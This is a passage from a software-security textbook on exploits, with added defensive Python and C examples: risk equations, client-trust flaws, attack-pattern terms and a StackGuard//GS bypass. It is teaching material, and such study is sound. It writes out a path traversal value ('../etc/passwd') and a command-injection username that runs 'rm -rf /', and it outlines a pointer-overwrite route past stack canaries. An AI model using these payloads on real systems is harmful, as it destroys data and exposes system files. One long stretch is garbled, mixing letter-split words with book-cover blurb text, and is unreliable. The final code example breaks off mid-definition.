Damage potential is a quantitative measurement. For example, if an attack is rated 10 points on a scale from 1 to 10 points and you are 100% exposed to the attack (1.0 in the range specified), then your site damage potential is 10 x 10 = 100%. This means your asset will be 100% compromised or destroyed.

Every attack has the real potential to create damage. We assess this potential by determining the potency of an attack. High-potency attacks are more likely to cause noticeable problems with applications (that is, things that users can see). Low-potency attacks do not cause noticeable problems.

Exposure and Potency

Another dimension, exposure, is a measure of how easy or difficult it is to carry out an attack. Exposure can also be measured. If an attack is blocked at the firewall, it is said to have low exposure. By testing the firewall, we can measure exposure for a given attack. High-potency attacks, by definition, cause noticeable problems when they do their thing. High-exposure attacks that are also high potency will cause a system to crash, but these kinds of high-potency attacks usually indicate only that the firewall is not configured properly. That is, they can in many cases be mitigated with reasonable firewall configurations.


On the other hand, medium-exposure attacks that cause high-potency problems indicate a weak target that is easily compromised. By definition, these attacks are not very likely to be stopped by firewall rules alone. Thus they make excellent fodder for software exploit. High-potency attack patterns that have medium-exposure dimensions include authentication hijack, protocol attacks, and extreme load situations. As we said, these kinds of attack only sometimes can be prevented/mitigated using firewalls, intrusion detection, and other common network security techniques. But note that these are attacks that cannot be easily prevented by a particular software application because they tend to take advantage of weaknesses at the communications level.

Input-driven attacks at the application level are usually high-exposure attacks. This means they easily slip under the radar of standard firewall or network-level technologies. There are many varieties of this kind of attack. Common attack patterns include malformed fields, manipulated input variables, and representation manipulation. Generally speaking, these kinds of attack attempt to stretch and manipulate the input space of the program.

We have described two important variables that can be measured during risk assessment: exposure and potency. In every case, at least one of these variables must be measured to make use of the simple equation presented in the next section. Because determining actual values for these variables costs money and resources, a single variable can be measured and used in the equation as long as the other variable is assumed to be 100%.

Actual Risk

Even if you are 100% exposed to an attack, but the attack itself does nothing to affect the target, then the attack is meaningless. This is known in risk analysis circles as impact. Actual risk measures the effect of an attack while at the same time considering the potential for damage. If the software is fully exposed to database injection attacks, the damage potential might be 100%. But if the database has no data, the impact is zero—thus the actual risk is zero. This amounts to saying, "The attack is possible and if it were carried out it would be devastating, but the attack is not useful because the database has no value."

The equation for actual risk is

Damage Potential (range) 0–10
x
Impact (measure or assume 100%)
=
Actual Risk x 10

Measuring damage potential is fairly inexpensive and easy because doing so only requires analysis of firewalls and other large-scale, network-level filtering devices. A complete software environment can be analyzed from a single gateway. However, note that in many cases the firewall or gateway is not configured to stop application layer traffic such as Web requests. This is when the second equation kicks in and reveals whether an attack pattern actually causes any damage.

What may come as a surprise is that attack patterns that are generically assumed to have little or no damage potential can sometimes end up causing a great deal of damage when a particular, individual site is tested. Our equations turn out to be useful in practice because they reflect what happens in the real world. For example, if a high-potency attack pattern is discovered, the site damage can clearly be mitigated by reducing the exposure. In many cases this can be accomplished by adding a new firewall rule—a relatively inexpensive solution. Of course, stopping all application-level attacks at the firewall does not scale well. A better alternative is to fix the application to reduce the potency of an attack pattern.
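To make the two equations concrete, here is a small added example (not code from the book) that applies them to a constructed set of attack patterns and shows the two mitigation levers just described: lowering exposure (a firewall rule) versus lowering potency (fixing the application). The sample potency, exposure and impact values are constructed, and the high/medium/low thresholds in risk_level are this example's own assumption; the text only recommends coarse levels over exact numbers.

```python
# Added example, not from the book: the damage potential and actual risk
# equations of this section applied to constructed attack patterns.
from dataclasses import dataclass
from typing import Dict, List, Tuple


@dataclass
class AttackPattern:
    name: str
    potency: int      # attack potency, 1..10 (given)
    exposure: float   # target exposure, 0.0..1.0 (measured, or assume 1.0)
    impact: float     # impact, 0.0..1.0 (measured, or assume 1.0)


def damage_potential(potency: int, exposure: float) -> float:
    """Attack Potency x Target Exposure = Damage Potential, in the range 0..10."""
    if not 1 <= potency <= 10:
        raise ValueError("potency must be in 1..10")
    if not 0.0 <= exposure <= 1.0:
        raise ValueError("exposure must be in 0.0..1.0")
    return potency * exposure


def actual_risk(potency: int, exposure: float, impact: float) -> float:
    """Damage Potential x Impact = Actual Risk, in the range 0..10."""
    if not 0.0 <= impact <= 1.0:
        raise ValueError("impact must be in 0.0..1.0")
    return damage_potential(potency, exposure) * impact


def as_percent(score: float) -> float:
    """The section multiplies the 0..10 result by 10 to report a percentage."""
    return score * 10


def risk_level(score: float) -> str:
    """Coarse high/medium/low bucket of a 0..10 score.
    Thresholds are this example's assumption, not the book's."""
    if score >= 7:
        return "high"
    if score >= 4:
        return "medium"
    return "low"


def assess(patterns: List[AttackPattern]) -> Dict[str, Tuple[float, float, str]]:
    """Return {name: (damage potential %, actual risk %, level)} per pattern."""
    out = {}
    for p in patterns:
        dp = as_percent(damage_potential(p.potency, p.exposure))
        ar = as_percent(actual_risk(p.potency, p.exposure, p.impact))
        out[p.name] = (dp, ar, risk_level(ar / 10))
    return out


def mitigate_by_exposure(p: AttackPattern, new_exposure: float) -> AttackPattern:
    """Lever 1 from the text: add a firewall rule, i.e. lower the exposure."""
    return AttackPattern(p.name, p.potency, new_exposure, p.impact)


def mitigate_by_potency(p: AttackPattern, new_potency: int) -> AttackPattern:
    """Lever 2 from the text: fix the application, i.e. lower the potency."""
    return AttackPattern(p.name, new_potency, p.exposure, p.impact)


# Constructed sample inventory; the numbers are illustrative, not measured.
SAMPLE_PATTERNS = [
    # The text's own worked case: potency 10, fully exposed -> 100%.
    AttackPattern("malformed-field overflow", potency=10, exposure=1.0, impact=1.0),
    # Fully exposed database injection, but the database holds nothing:
    # damage potential 100%, impact zero, so actual risk is zero.
    AttackPattern("database injection (empty db)", potency=10, exposure=1.0, impact=0.0),
    # A high-potency pattern the firewall already blocks three times in four.
    AttackPattern("protocol attack", potency=8, exposure=0.25, impact=1.0),
]

if __name__ == "__main__":
    for name, (dp, ar, level) in assess(SAMPLE_PATTERNS).items():
        print(f"{name:32s} damage potential {dp:5.1f}%  actual risk {ar:5.1f}%  ({level})")
    fixed = mitigate_by_potency(SAMPLE_PATTERNS[0], 3)
    print("after fixing the application:", assess([fixed]))
```

The second sample pattern reproduces the text's empty-database case: the first equation alone reports 100%, and only the impact term in the second equation brings the actual risk down to zero. Applying mitigate_by_exposure to the first pattern shows how a single firewall rule changes the score without touching the code, while mitigate_by_potency shows the effect of the fix the text prefers.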




Tour of an Exploit

What happens when a software program is attacked? We introduce a simple house analogy to guide you through a software exploit. The "rooms" in our target software correspond to blocks of code in the software that perform some function. The job at hand is to understand enough about the rooms to wander through the house at will.


Each block of code (room) serves a unique purpose to the program. Some code blocks read data from the network. If these blocks are rooms in a house and the attacker is standing outside the door on the porch, then networking code can be thought of as the foyer. Such network code will be the first code to examine and respond to a remote attacker's input. In most cases, the network code merely accepts input and packages it into a data stream. This stream is then passed deeper into the house to more complex code segments that parse the data. So the (network code) foyer is connected by internal doorways to adjacent, more complex rooms. In the foyer, not much of interest to our attack can be accomplished, but directly connected to the foyer is a kitchen with many appliances. We like the kitchen, because the kitchen can, for example, open files and query databases. The attacker's goal is to find a path through the foyer into the kitchen.

The Attacker's Viewpoint

An attack starts with breaking rules and undermining assumptions. One of the key assumptions to test is the "implicit trust" assumption. Attackers will always break any rule relating to when, where, and what is "allowed" to be submitted as input. For the same reasons that software blueprints are rarely made, software is only rarely subjected to extensive "stress testing," especially stress testing that involves purposefully presenting malicious input. The upshot is that users are, for reasons of inherent laziness, trusted by default. An implicitly trusted user is trusted to supply correctly formed data that play by the rules and are thus also implicitly "trusted."

To make this clearer, we'll restate what's going on. The base assumption we'll work against is that trusted users will not supply "malformed" or "malicious" data! One particular form of this trust involves client software. If client software is written to send only certain commands, implicit assumptions are often made by the architects that a reasonable user will only use the client software to access the server. The issue that goes unnoticed is that attackers usually write software. Clever attackers can write their own client software or hack up an existing client. An attacker can (and will) craft custom client software capable of delivering malformed input on purpose and at just the right time. This is how the fabric of trust unravels.

Why Trusting Users Is Bad

We now present a trivial example that shows how implicitly trusting a client unravels. Our example involves the maxsize attribute of a Hypertext Markup Language (HTML) form. Forms are a common way of querying users on a Web site for data. They are used extensively in almost every type of Web-based transaction. Unfortunately, most Web forms expect to receive proper input.

The developer who constructs a form has the ability to specify the maximum number of characters that a user is allowed to submit. For example, the following code limits the "username" field to ten characters:

Username


A designer who misunderstands the underlying technology might assume that a remote user is limited to submitting ten characters in the name field. What they might not realize is that the enforcement of field length takes place only on the remote user's machine, within the user's Web browser itself! The problem is that the remote user might have a Web browser that doesn't pay attention to the size restriction. Or the remote user might build a malicious browser that has this property (if they are an attacker). Or better yet, the remote user might not use a Web browser at all. A remote user can just submit the form request manually in a specially crafted uniform resource locator (URL):

http://victim/login.cgi?username=bill_the_cat

In any case, the remote user should most definitely not be trusted, and neither should the remote user's software! There is absolutely nothing that prevents the remote user from submitting a URL such as

http://victim/login.cgi?username=THIS_IS_WAY_TOO_LONG_FOR_A_USERNAME

Assumptions involving trust, like the one presented here, make up secret doorways between rooms in the house of logic. A clever user can use the "implicit trust" doorway to sneak right through the foyer and into the kitchen.
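The server-side counterpart to the form above, as an added example that is not the book's code: it takes the raw request URL, pulls out the username parameter with Python's urllib.parse, and applies the ten-character limit on the server, where nothing the browser did or did not enforce matters. The login.cgi script, the field name and the two URLs are taken from the text; the character whitelist and the rejection of a repeated parameter are this example's own assumptions about a sensible policy.

```python
# Added example, not from the book: server-side enforcement of the limit the
# HTML form only enforces inside the client's browser.
from typing import Optional, Tuple
from urllib.parse import parse_qs, urlsplit

USERNAME_MAX = 10  # the limit the form declares; the server must repeat it
# Assumed policy: usernames are letters, digits and underscore only.
USERNAME_CHARS = frozenset("abcdefghijklmnopqrstuvwxyz"
                           "ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_")


def username_from_url(url: str) -> Optional[str]:
    """Return the username parameter exactly as the client sent it,
    or None when the field is missing or appears more than once."""
    values = parse_qs(urlsplit(url).query, keep_blank_values=True).get("username", [])
    if len(values) != 1:
        return None
    return values[0]


def validate_username(raw: Optional[str]) -> Tuple[bool, str]:
    """Check the field on the server without trusting the browser's maxlength."""
    if raw is None:
        return False, "missing or repeated username field"
    if len(raw) > USERNAME_MAX:
        return False, f"username longer than {USERNAME_MAX} characters"
    if not raw or any(ch not in USERNAME_CHARS for ch in raw):
        return False, "username contains disallowed characters"
    return True, "ok"


def handle_login(url: str) -> Tuple[bool, str]:
    """What login.cgi should do first with any request it receives."""
    return validate_username(username_from_url(url))


# Constructed requests: the two URLs from the text plus a hand-built one that
# no browser form would ever produce (the same field sent twice).
REQUESTS = [
    "http://victim/login.cgi?username=bill_the_cat",
    "http://victim/login.cgi?username=THIS_IS_WAY_TOO_LONG_FOR_A_USERNAME",
    "http://victim/login.cgi?username=bob&username=eve",
]

if __name__ == "__main__":
    for url in REQUESTS:
        print(url, "->", handle_login(url))
```

Run against the text's own URLs, the over-long username is rejected regardless of how it was submitted. Note that bill_the_cat is itself twelve characters, so a strict ten-character check rejects it as well: the server-side limit has to match what the application really accepts, and the form's declared limit is only a courtesy to honest browsers.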

Like a Lock Pick

An attacker must carefully craft attack input as data to be presented in a particular order. Each bit of data in the attack is like a key that opens a code path door. The complete attack is like a set of keys that unlocks the internal code paths of the program, one door at a time. Note that this set of keys must be used in the precise order that they appear on the key chain. And once a key has been used, it must be discarded. In other words, an attack must include presenting exactly the right data in exactly the right order. In this way, exploiting software is like picking locks.

Software is a matrix of decisions. The decisions translate into branches that connect blocks of code to one another. Think of these branches as the doorways that connect rooms. Doors will open if the attacker has placed the right data (the key) in the right order (location on the key chain).

Some of the code locations in the program make branching decisions based on user-supplied data. This is where you can try a key. Although finding these code locations can be very time-consuming, in some cases the process can be automated. Figure 2-2 diagrams the code branches of a common File Transfer Protocol (FTP) server. The graph indicates which branches are based on user-supplied data.

Figure 2-2. This graph illustrates the branching logic of a common FTP server. Blocks indicate continuous code and lines indicate jumps and conditional branches between code blocks. Blocks outlined in bold indicate that user-supplied data are being processed.



Graphing of the sort shown in Figure 2-2 is a powerful tool when reverse engineering software. However, sometimes a more sophisticated view is needed. Figure 2-3 shows a more sophisticated three-dimensional graph that also illuminates program structure.

Figure 2-3. This graph is rendered in three dimensions. Each code location looks like a small room. We used the OpenGL package to illustrate all the code paths leading toward a vulnerable sprintf call in a target program.

Inside particular program rooms, different parts of a user's request are processed. Debugging tools can help you to determine what sort of processing is being done where. Figure 2-4 shows a disassembly of a single code location from a target program. Going by our analogy, this code appears in a single room in the house (one of the many boxes shown in the earlier figures). The attacker can use information like this to shape an attack, room by room.

Figure 2-4. Disassembly of one "room" in the target program. The code at the top of the listing is a set of program instructions. The instructions that deal with user-supplied data are called out at the bottom of the listing. Exploiting software usually involves understanding both how data flow in a program (especially user data) and how data are processed in given code blocks.



A Simple Example

Consider an exploit in which the attacker executes a shell command on the target system. The particular software bug responsible for causing the vulnerability might be a code snippet like this:


$username = $ARGV[0];   # user-supplied data, passed to the shell unchecked
system("cat /logs/$username" . ".log");

Note that the call to the system() function takes a parameter that is unchecked. Assume, for this example, that the username parameter is delivered from an HTTP cookie. The HTTP cookie is a small data file that is controlled entirely by the remote user (and is typically stored in a Web browser). Software security-savvy developers know that a cookie is something that should never be trusted (unless you can cryptographically protect and verify it).

The vulnerability we exploit in this example arises because untrusted cookie data are being passed into and used in a shell command. In most systems, shell commands have some level of system-level access, and if a clever attacker supplies just the right sequence of characters as the "username," the attacker can issue commands that control the system.

Let's examine this in a bit more detail. If the remote user types in the string bracken, corresponding to a user name, then the resulting command sent through the system() call of our code snippet will be

cat /logs/bracken.log

This shell command displays the contents of the file bracken.log in the directory /logs in the Web browser. If the remote user supplies a different username, such as nosuchuser, the resulting command will be

cat /logs/nosuchuser.log




If the file nosuchuser.log does not exist, a minor "error" occurs and is reported. No other data are displayed. From the perspective of an attacker, causing a minor error like this is no big deal, but it does give us an idea. Because we control the username variable, we can insert whatever characters we choose as the username we supply. The shell command is fairly complex and it understands lots of complex character sequences. We can take advantage of this fact to have some fun.

Let's explore what happens when we supply just the right characters in just the right order. Consider the funny-sounding username "../etc/passwd." This results in the following command being run for us:

cat /logs/../etc/passwd.log

We are using a classic directory redirection trick to display the file /etc/passwd.log. So as an attacker, we wield complete control of the filename that is being passed to the cat command. Too bad there isn't a file called /etc/passwd.log on most UNIX systems!

Our exploit so far is pretty simple and isn't getting us very far. With a little more cleverness, we can add another command to the mix. Because we can control the contents of the command after cat ..., we can use a trick to add a new command to the mix. Consider a devious username, such as "bracken; rm -rf /; cat blah," which results in three commands being run, one after the other. The second command comes after the first ";" and the third after the second ";":

cat /logs/bracken; rm -rf /; cat blah.log

Wit h t his sim ple at t ack w e'r e using t h e m ult iple- com m and t r ick t o r emov e all t he f iles r ecur sively f rom t he r oot dir ect or y / ( and m aking t h e syst em " j ust d o it " and not ask u s any Macint osh- lik e quest ions) . Af t er w e do t his, t he u nf ort u nat e v ict im w ill be left w it h a r oot

dir ect or y an d p er h aps a lost - an d- f ound dir ect or y at m ost . That ' s som e pr et t y ser ious d amag e t hat can be inf lict ed sim ply as t he r esu lt of one sing le user n ame v uln er abilit y on a b r oken Web sit e! I t 's ver y im por t ant t o n ot ice t hat w e ch ose t he v alue of t he user nam e in an int ellig en t f ash ion so t h at t h e final comm and st r ing w ill be f orm at t ed corr ect ly and t he em bedd ed m alicious com man ds w ill be pr operly ex ecut ed . Becau se t he " ; " ch ar act er is u sed t o separ at e m ult iple com man ds t o t he sy st em ( a UNI X box ) , w e'r e act ually d oin g t hr ee com m ands here. Bu t t h is • Table of Content s at t ack isn' t all t hat sm ar t ! Th e fin al par t of t he com man d t hat ru ns cat blah.log is unlik ely • I ndex t o be successful! We d elet ed all t he f iles! Expl oit ing Softw a re How to Br e ak Code

SoGrall all, t h is sim pleawat t ack is about con t r ollin g st r ings of dat a an d lev er ag in g sy st em - lev el By eg in Hoglund , Gar y McGr langu age sy nt ax . Pub lish er: Addison Wesley

Of cour se our ex am ple at t ack is t r ivial, b ut it show s w hat can result w h en t h e t ar get soft war e Pub Dat e: February 17, 200 4 is capable of r un ning com man ds on a sy st em t hat are su pplied f r om an unt ru st ed sour ce. 20 1- 786 95 -8 St at ed I SBN: in t er0-m s of t he h ouse analogy , t here w as an ov erlook ed d oor t hat allow s a m aliciou s Pages: 51 user t o con t rol2 w hich com m ands t he pr og ram en ds up ex ecut in g. I n t his k ind of at t ack w e' r e only exer cising pr eexist ing capabilit ies built righ t in t o t h e t ar get . As w e w ill see, t here ar e f ar m or e pow erf ul at t acks t hat com plet ely by pass t he cap abilit ies of t he t arg et soft w ar e u sing inj ect ed code ( and ev en v iru ses) . As an exam p le, consider b uff er ov er fdlow t acks t hat are ?soHow powdo erfat ul t acker t hat t shey, in som e ar sen b last d oorwWhy ay s int How oesatsof t w are br eak m ake sof t w e se, br eak on new p ur pose? areo t he hou se of log ic en t irely , br eaking d own t h e cont r ol f low w alls wit h a giant sledg eh amm fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad er g uyand s? chain saw . What we' re t ry ing t o say here is t hat t here ex ist dir ect at t ack s on t he v ery What t ools can be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. st r uct ur e of a p r ogr am, and somet im es t hese at t acks r ely on fair ly deep k now ledge ab out how t he b eg in w it h. Som etles im es now ledge includes m achine Ex p lo i t inhgouse S o ftiswbuilt a re ist oloaded h ex amp of trhe ealkat t ack s, at requ t ack ired pat t er ns, t ools, an d langu ageesanused d m icr ip guy ar chit r e. Of r se, ar eect a by it m or comp t echniqu byoch bad s t ect o bru eak sofcou t w ar e. Iat f tyack ou sw like ant t ohis p rot our sofet w ar e licat fr omed tat han t h e sim p le one w e show ed y ou her e. 
t ack , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . This m ust - h ave book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t Why sof t w ar e ex ploit w ill con t inue t o be a ser ious p r oblem When net w or k secur it y m ech anisms do n ot w or k At t ack pat t er ns Rev er se engineer in g Classic at t acks ag ainst serv er soft w ar e Sur pr ising at t acks ag ainst clien t soft war e Tech niqu es f or cr aft ing m aliciou s inpu t The t echn ical det ails of b uf fer ov er f low s Root k it s Ex p lo i t in g S o ft w a re is f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak soft w ar e.
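The command strings above, worked through as an added C example that is not from the book: it builds the site's "cat /logs/<username>.log" string the way the broken log viewer does, counts how a shell would split that string on ";", and then shows the two checks a practitioner would add, an allowlist on the username and passing the filename as its own argv entry instead of through a shell. The log-viewer command and the two usernames are the book's; the allowlist policy, the length cap and the function names are assumptions made here.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* Builds the command the broken log viewer hands to the shell,
   "cat /logs/<username>.log", by plain concatenation. Constructed to mirror
   the text; nothing here executes anything, the point is the resulting string.
   Returns the length, or -1 if it does not fit in out. */
int build_log_command(const char *username, char *out, size_t outsz) {
    int n = snprintf(out, outsz, "cat /logs/%s.log", username);
    return (n < 0 || (size_t)n >= outsz) ? -1 : n;
}

/* Rough model of how sh splits the string: ';' outside quotes ends a command.
   Shows that "bracken; rm -rf /; cat blah" yields three commands, not one. */
int shell_command_count(const char *cmd) {
    int count = 1, in_single = 0, in_double = 0;
    if (*cmd == '\0') return 0;
    for (const char *p = cmd; *p; p++) {
        if (*p == '\'' && !in_double) in_single = !in_single;
        else if (*p == '"' && !in_single) in_double = !in_double;
        else if (*p == ';' && !in_single && !in_double) count++;
    }
    return count;
}

/* The check to run before any string is built: an allowlist (assumed policy).
   Only [A-Za-z0-9_-] of modest length passes, so '/', '.', ';', ' ', '&', '|'
   and friends never reach the shell, and "../etc/passwd" cannot traverse. */
int username_is_safe(const char *username) {
    size_t len = strlen(username);
    if (len == 0 || len > 32) return 0;
    for (size_t i = 0; i < len; i++) {
        unsigned char c = (unsigned char)username[i];
        if (!(isalnum(c) || c == '_' || c == '-')) return 0;
    }
    return 1;
}

/* The structural fix: no shell at all. Fill an argv for execvp("cat", argv)
   so the filename is a single argument and metacharacters carry no meaning.
   Returns the number of argv entries, or -1 if the username is rejected. */
int build_cat_argv(const char *username, char *pathbuf, size_t pathsz,
                   const char *argv[3]) {
    if (!username_is_safe(username)) return -1;
    int n = snprintf(pathbuf, pathsz, "/logs/%s.log", username);
    if (n < 0 || (size_t)n >= pathsz) return -1;
    argv[0] = "cat";
    argv[1] = pathbuf;
    argv[2] = NULL;
    return 2;
}

int main(void) {
    char cmd[256];
    const char *names[] = { "bracken", "../etc/passwd", "bracken; rm -rf /; cat blah" };
    for (size_t i = 0; i < 3; i++) {
        build_log_command(names[i], cmd, sizeof cmd);
        printf("%-30s -> %d command(s): %s  [safe=%d]\n", names[i],
               shell_command_count(cmd), cmd, username_is_safe(names[i]));
    }
    return 0;
}
```

Both checks are needed: the allowlist alone still leaves a shell in the path for the next field someone forgets to validate, and the argv form alone still lets "../etc/passwd" traverse, because path traversal does not need a shell.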

Attack Patterns: Blueprints for Disaster

Although novelty is always welcome, techniques for exploiting software tend to be few in number and fairly specific. This means that applying common techniques often results in the discovery of new software exploits. A particular exploit usually amounts to the extension of a standard attack pattern to a new target. Classic bugs and other flaws can thus be leveraged to hide data, escape detection, insert commands, exploit databases, and inject viruses. Clearly, the best way to learn to exploit software is to familiarize yourself with standard techniques and attack patterns, and to determine how they are instantiated in particular exploits.

An attack pattern is a blueprint for exploiting a software vulnerability. As such, an attack pattern describes several critical features of the vulnerability and arms an attacker with the knowledge required to exploit the target system.

Exploit, Attack, and Attacker

In the interest of keeping all our definitions in order, an exploit is an instance of an attack pattern created to compromise a particular piece of target software. Exploits are typically codified into easy-to-use tools or programs. Keeping exploits as stand-alone programs is usually a reasonable idea because in this way they can be easily organized and accessed.

An attack is the act of carrying out an exploit. This term can also be used loosely to mean exploit. Attacks are events that expose a software system's inherent logical errors and invalid states.

Lastly, an attacker is the person who uses an exploit to carry out an attack. Attackers are not necessarily malicious, although there is no avoiding the connotations of the word. Notice that in our use of the term, script kiddies and those who are not capable of creating attack patterns and exploits themselves will qualify as attackers! It is the attacker who poses a direct threat to the target system. Every attack has an intent that is guided by a human. Without an attacker, an attack pattern is simply a plan. The attacker puts the plan into action. Each attack can be described relative to vulnerabilities in the target system. The attacker may restrict or enable an attack, depending on skill level and knowledge. Skilled attackers do a better job of instantiating an attack pattern than unskilled attackers.

Attack Pattern

Our use of the term pattern is after Gamma et al. [1995]. An attack pattern is like a pattern in sewing: a blueprint for creating a kind of attack. Everyone's favorite example, buffer overflow attacks, follow several different standard patterns. Patterns allow for a fair amount of variation on a theme. They can take into account many dimensions, including timing, resources required, techniques, and so forth.

An attack pattern involves an injection vector that simultaneously exposes an activation zone and contains a payload. The most important thing to understand about a basic attack pattern is the distinction between the injection vector and the payload. A good exploit will not only break the code, but will also leverage problems to execute some payload code. The trick is to use the flaw or bug to drop a payload into place and start it running.

Injection Vector

An injection vector describes, as precisely as possible, the format of an input-driven attack.

Each target environment imposes certain restrictions on how an attack must be formatted. Depending on the existing security mechanisms, an injection vector may become very complex. The goal of the injection vector is to place the attack payload into a target activation zone. Injection vectors must take into account the grammar of an attack, the syntax accepted by the system, the position of various fields, and the numerical ranges of data that are acceptable. Injection vectors thus comprise truly generic rules for formatting an attack. These rules are dictated by the restrictions of the target environment. Injection vectors must also produce feedback events so that we can observe attack behavior.

Activation Zone

An activation zone is the area within the target software that is capable of executing or otherwise activating the payload. The activation zone is where the intent of the attacker is put into action. The intent of the attacker is realized in the activation zone by the attack payload. The activation zone may be a command interpreter, some active machine code in a buffer, or a system API call. The activation zone produces the output event. When a payload is executed, this is called payload activation.

Output Event

Output events indicate that the desired outcome of an attack (from the attacker's point of view) has indeed occurred. An output event may be, for example, the creation of a remote shell, execution of a command, or the destruction of data. An output event can sometimes be decomposed into a set of small, supporting events that together provide aggregation evidence that the final goal is being attained. These smaller events are called elements of the output event. Output events can be hierarchically organized and can build up to the ultimate goal of the attack. An output event certainly demonstrates that the intent of the attacker has been accomplished.

Feedback Event

As the system is actively probed to assess its vulnerability, feedback events occur. Feedback events are those events that are readily visible to the attacker. The amount of visibility depends on the environment of the attack. Examples of feedback events primarily include content/result data from queries, and timing information about those events. For example, the response time of a given transaction is a feedback event. Feedback events are instrumental in determining whether an attack is succeeding.

An Example Exploit: Microsoft's Broken C++ Compiler

An example can help clarify our terminology by tying it in with reality. In this section we consider the overemphasized (but extremely relevant) buffer overflow attack pattern. Of course, how much risk a buffer overflow triggers differs according to context. The occasional buffer overflow that is a real bug (and thus a problem) at a technical level does not result in unacceptable risk. Most do, however. Buffer overflow is such an important phenomenon that we relegate an entire chapter (Chapter 7) to it. For now, we'll use a real example to show how an attack pattern can be turned into an exploit. Along the way we'll show you some code. You can play attacker, take our code, compile it, and run the attack against it to see what happens. As you will see, this example is particularly fun because of the irony factor.

In February 2001, Microsoft added a security feature to their C++ compiler, the latest version of which is called both Visual C++ .Net and Visual C++ version 7. (Chris Ren, a Cigital research associate, discovered this vulnerability and contributed heavily to this section.) To get this exploit to work for you, you'll need to dig up a broken version of the compiler.

The new security feature is meant to protect potentially vulnerable source code automatically from some forms of buffer overflow attack. The protection afforded by the new feature allows developers to continue to use vulnerable string functions such as strcpy() (which is the star of many a bug) as usual and still be "protected" against stack smashing. The new feature is closely based on an invention of Crispin Cowan's called StackGuard and is meant to be used when creating standard native code (not the new .NET intermediate language) [Cowan et al., 1998]. Note that the new feature is meant to protect programs compiled with the "protected" compiler. In other words, using this feature should help developers build more secure software. However, in its broken form, the Microsoft feature leads to a false sense of security because it is easily defeated.

Microsoft appears to have chosen efficiency over security when faced with a security tradeoff, something they have done consistently in the past.

StackGuard is not a perfect approach for stopping buffer overflow attacks. In fact, it was developed in the context of a fairly serious constraint. Cowan merely patched the gcc code generator so as not to require a new compiler or to "rearchitect" the gcc compiler from the ground up.

Microsoft's feature includes the ability to set a "security error handler" function to be called when a potential attack is underway. The fact that an attack can be identified so readily shows the power of the attack pattern concept. Because of the way the security error handler was implemented, the Microsoft security feature itself is vulnerable to attack. Ah, the irony. An attacker can craft a special-purpose attack against a "protected" program, defeating the protection mechanism in a straightforward way. Of course this new kind of attack constitutes a new attack pattern.

There are several well-known approaches not based on StackGuard that a compiler producer might use to defeat buffer overflow attacks. Microsoft chose to adopt a poor solution rather than a more robust solution. This is a design-level flaw that leads to a very serious set of potential attacks against code compiled with the new compiler. In other words, the Microsoft compiler is, in some sense, a "vulnerability seeder."

Instead of relying on a runtime compiler feature to protect against some kinds of buffer overflows, developers and architects should put in place a rigorous software security regimen that includes source code review. Static analysis tools (like Cigital's SourceScope or the open source program ITS4) can and should be used to detect potential problems in C++ source code of the sort that the broken Microsoft feature is meant to thwart. Completely removing these problems from code in advance is much better than trying to catch them when they are exploited at runtime.[8]

[8] See Building Secure Software [Viega and McGraw, 2001] for material on source code analysis and its role in security review.

Microsoft is making an important push to improve software security, as evidenced by the Gates memo of January 2002. However, Microsoft clearly has room for improvement if even their security features have architectural security problems. One elegant feature of StackGuard and its related Microsoft cousin is the efficiency of the checking mechanisms. However, the mechanism can be bypassed in several ways. The kinds of attack that Cigital made use of to defeat the Microsoft mechanism are neither novel nor do they require exceptional expertise. Had Microsoft studied the literature surrounding StackGuard, they would have been aware of the existence of such attacks.


Technical Details of the Attack

The /GS compiler option in Visual C++ .Net (Visual C++ 7.0) allows developers to build their applications with a so-called "buffer security check." In 2001, there were at least two Microsoft articles, one by Michael Howard and one by Brandon Bray, published to introduce the option.[9] Based on reading the documentation of the /GS option and examining binary instructions generated by the compiler with the option, Cigital researchers determined that the /GS option is in essence a Win32 port of StackGuard. This has been independently verified by researchers at Immunix.

[9] Both articles, "New Visual C++ .NET Option Tightens Buffer Security" (http://security.devx.com/bestdefense/2001/mh0301/mh0301-1.asp) and "How Visual C++ .NET Can Prevent Buffer Overruns" (http://www.codeproject.com/tips/gsoption.asp), have been removed from the Net.

Overflowing an unchecked stack buffer makes it possible for an attacker to hijack a program's execution path in many different ways. A well-known and often used attack pattern involves overwriting the return address on the stack with an attacker's desired address so that a program under attack will jump to the address on function exit. The attacker places attack code at this address, which is subsequently executed.

The inventors of StackGuard first proposed the idea of placing a canary before the return address on function entry so that the canary value can be used on function exit to detect whether the return address has been altered. They later improved their implementation by XORing the canary with the return address on function entry to prevent an attacker from overwriting the return address while bypassing the canary [Cowan et al., 1998]. StackGuard turns out to be a reasonable way of preventing some kinds of buffer overflows by detecting them at runtime. A similar tool, called StackShield, uses a separate stack to store return addresses, which is yet another way to defeat some kinds of buffer overflows.

Modifying a function return address is not the only way to hijack a program. Other possible attacks that can be used to bypass buffer protection tools like StackGuard and StackShield are discussed in an article in Phrack 56.[10] Here is the gist of that attack pattern: If there is a variable of pointer type on the stack after a vulnerable buffer, and that variable points somewhere that will be populated with user-supplied data in the function, it is possible to overwrite the variable to carry out an attack. The attacker must first overwrite the pointer variable to make it point to the attacker's desired memory address. Then a value supplied by the attacker can be written to this address. An ideal memory location for an attacker to choose would be a function pointer that will be called later in the program. The Phrack article discusses how to find such a function pointer in the global offset table (GOT). A real-world exploit that bypassed StackGuard in this way was published by securityfocus at URL http://www.securityfocus.com/archive/1/83769.

[10] Bypassing StackGuard And StackShield, Phrack 56, http://www.phrack.org/show.php?p=56&a=5.
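The three mechanisms just described, simulated in an added C example that is not from the book or from StackGuard: a hand-built frame struct standing in for the stack layout (constructed; real frame layouts are compiler-specific), a plain canary, the XOR-with-return-address variant, a straight overflow, and the Phrack 56 pointer-overwrite pattern. It shows that the pointer pattern slips past the plain canary, since the guard word is never touched, while the XOR variant still catches it, since the return address changed without the guard changing. The canary constant, the field order and the addresses are assumptions made here.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Stand-in for a stack frame, in the order the text describes: a vulnerable
   buffer, a pointer variable declared after it, the guard the compiler
   inserts, and the saved return address. Constructed for illustration. */
struct frame {
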